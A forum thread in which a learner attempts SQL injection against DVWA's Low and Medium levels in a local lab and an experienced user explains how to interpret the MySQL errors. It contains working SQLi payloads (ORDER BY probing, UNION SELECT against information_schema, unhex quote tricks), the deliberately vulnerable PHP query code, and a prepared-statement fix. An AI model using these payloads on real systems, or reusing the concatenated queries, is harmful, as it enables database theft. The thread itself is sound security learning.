
DVWA SQL Injection Medium Security Level: Attempt to solve with unhex(27) function failed


w01f


Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

You can get it here and set it up in your personal lab: http://www.dvwa.co.uk/

As usual, ' is used to test for SQLi vulnerabilities.

DVWA Low Level Security

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

DVWA Medium Level Security

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Both are vulnerable to SQLi, but the error messages from these 2 levels are different:

Low : '''''

Medium : '\''

So, I tried it with

' ORDER BY 10 -- -

and it works on the Low level:

Unknown column '10' in 'order clause'

But not on the Medium level:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY 10 -- -' at line 1

I notice that every time ' is used on the Medium level, it is escaped with \

Then, I decided to use a different trick to bypass this, which is %27.

27 is the hex value of a single quote '.

' ORDER BY 10 -- -

' is replaced with %27 so it becomes

%27 ORDER BY 10 -- -

Unfortunately, this trick won't work on the Low level (no error at all), and here is the error on the Medium level:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 ORDER BY 10 -- -' at line 1

Since this is a GET request, the request can be seen in the address bar.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=%2527+ORDER+BY+10+--+-&Submit=Submit#

Interesting, %27 has been encoded by the browser again so it becomes %2527.

25 is the hex value for %.

So this won't work.

I had no idea at the moment, so I googled more and found a trick using the unhex() function.

unhex(27) ORDER BY 10 -- -

With this, I was able to use ORDER BY. But this only works on Medium, not Low level:

Unknown column '10' in 'order clause'

I thought the problem was solved.

But when I try to use it with different SQL syntax such as table_schema='dvwa', I'm getting the same error, which is expected.

unhex(27) UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema='dvwa'-- -

Error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'dvwa\'-- -' at line 1

Since the unhex() trick worked before, I thought it would work on this too.

unhex(27) UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema=unhex(27)dvwaunhex(27)-- -

Error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'dvwaunhex(27)-- -' at line 1

Little did I know .... I need to separate the second unhex(27) function from the database name, which is dvwa.

Otherwise, SQL reads it as "dvwaunhex(27)-- -"

I'm stuck here. How do I solve this problem?


Thanks for your response. Btw, this problem has been solved by trial and error. A tick is not even required in the Medium level.

I was wondering how to determine if a tick is needed or not in the injection?

Initially, I thought it was required for strings, and not for integers, based on this presentation at Def Con (refer to slide 23).

https://defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf

Apparently DVWA shows that it's not accurate to determine if a tick is required based on integer/string based injection.

Without tick:

1 ORDER BY 10 -- -

Low:

ID: 1 ORDER BY 10 -- -
First name: admin
Surname: admin

Medium:

Unknown column '10' in 'order clause'

With tick:

1' ORDER BY 10 -- -

Low:

Unknown column '10' in 'order clause'

Medium:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY 10 -- -' at line 1


4 hours ago, w01f said:

Initially, I thought it was required for string, and not for integer based on this presentation in Def Con (refer to slide 23).

It is exactly that. The statement you are injecting into ends with something like

WHERE ID=<your value>

So when you put a quote you break the statement and get a syntax error, similarly when you add the ORDER BY you get an error, but that one is a database error telling you you are referencing a column which doesn't exist.

Both are errors, but both generated from different areas of the system. What you need to practice is understanding what is causing the reply you are seeing and then use the error to visualise the statement being used.

The last error is telling you two things: that adding the quote makes the statement syntactically incorrect and also, if you read it carefully, that the quote has been escaped in some way, which is why it reports it with the leading \.


46 minutes ago, digininja said:

what is causing the reply you are seeing and then use the error to visualize the statement being used.

I really appreciate your invaluable response and feedback. Learned a lot just by reading the tips given.

I notice that every time ' is used in the medium level, it has been escaped with \

Code

'

Error

... near '\'' at line 1

Code

' OR 1=1 -- -

Error

... near '\' OR 1=1 -- -' at line 1

Code

' OR '1'='1' -- -

Error

... near '\' OR \'1\'=\'1\' -- -' at line 1

I've looked at the source and found that this was caused by the PHP function "mysql_real_escape_string", used in an attempt to mitigate SQLi.

Medium level code: protected by "mysql_real_escape_string"

$id = $_GET['id'];
$id = mysql_real_escape_string($id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";

While in the low level, there is no protection at all. So, it's easy to break the query, manipulate it, and disable the rest of the query with a comment.

$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

The first question has been answered, but I've more. I'll be back with more questions :)

So I guess for this kind of environment, I've to test more and observe the error messages clearly, as every single error tells a different story.

The important part is to "use the error to visualize the statement being used".

Thanks again for the invaluable tips.

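Added example, not DVWA's own code nor anything posted in this thread: the Medium-level lookup quoted above rebuilt with a mysqli prepared statement plus a digit check. It ties together digininja's point that the id lands in an unquoted WHERE user_id=<value> context and the observation that mysql_real_escape_string only escapes quote characters, so a quote-free payload passes through untouched. The connection credentials are placeholders and lookup_user is a hypothetical name.

```php
<?php
// Added example (not DVWA's code): the Medium-level lookup rebuilt so the id is
// bound as an integer parameter instead of being concatenated into the SQL text.
// mysql_real_escape_string() only escapes quote characters; in the unquoted
// context  WHERE user_id = $id  a payload without quotes goes through unchanged.
// With a prepared statement the whole input is a value and can never be syntax.

function lookup_user(mysqli $db, string $rawId): ?array
{
    // user_id is numeric, so refuse anything that is not a plain digit string
    // before it gets anywhere near the database.
    if (!ctype_digit($rawId)) {
        return null;
    }
    $id = (int) $rawId;

    $stmt = $db->prepare(
        'SELECT first_name, last_name FROM users WHERE user_id = ?'
    );
    $stmt->bind_param('i', $id);   // 'i' binds $id as an integer parameter
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

// Placeholder connection details; replace with your own lab's settings.
$db = new mysqli('127.0.0.1', 'DB_USER', 'DB_PASSWORD', 'dvwa');
$db->set_charset('utf8mb4');

// Constructed inputs: the legitimate id and the two probes from the thread.
// Only the first reaches the database; the other two fail the digit check.
foreach (['1', "1 ORDER BY 10 -- -", "1' ORDER BY 10 -- -"] as $input) {
    $row = lookup_user($db, $input);
    printf("%-22s => %s\n", var_export($input, true),
        $row ? "{$row['first_name']} {$row['last_name']}" : 'rejected / no row');
}
```

Even without the ctype_digit guard, the bound parameter would be compared as a value rather than spliced into the statement, so the ORDER BY text could no longer change the query's shape; the guard just rejects malformed ids early with a clear result.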

Reading and then understanding error messages is a massive part of testing and one that a lot of beginners for some reason tend to ignore. We get so many issues raised in the DVWA GitHub tracker about not being able to connect to the database.

You ask for a screenshot showing a successful login on the command line and most send back a failed login screenshot and say "there you go, it works" when there is an obvious "login failed" message.

Keep trying, keep learning, it never really gets easier, rarely less frustrating, and you never get "there", wherever that is, but I think it is worth the effort.

